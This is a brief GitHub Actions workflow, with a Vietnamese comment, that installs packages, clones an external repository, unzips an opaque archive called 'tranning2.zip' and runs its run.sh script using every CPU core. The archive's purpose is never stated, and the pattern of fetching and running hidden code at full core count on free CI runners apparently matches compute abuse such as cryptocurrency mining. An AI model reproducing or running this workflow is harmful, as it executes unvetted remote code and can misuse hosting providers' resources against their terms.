name: Auto Setup and Run

on:
  workflow_dispatch:  # Cho phép chạy thủ công

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout this repo
        uses: actions/checkout@v3

      - name: Install dependencies
        run: |
          sudo apt-get update
          sudo apt-get install -y python3 python3-pip unzip git

      - name: Clone and run
        run: |
          git clone https://github.com/Teo4268/Bjndersrb.git
          cd Bjndersrb
          unzip tranning2.zip
          cd tranning2
          chmod +x run.sh
          ./run.sh $(nproc)
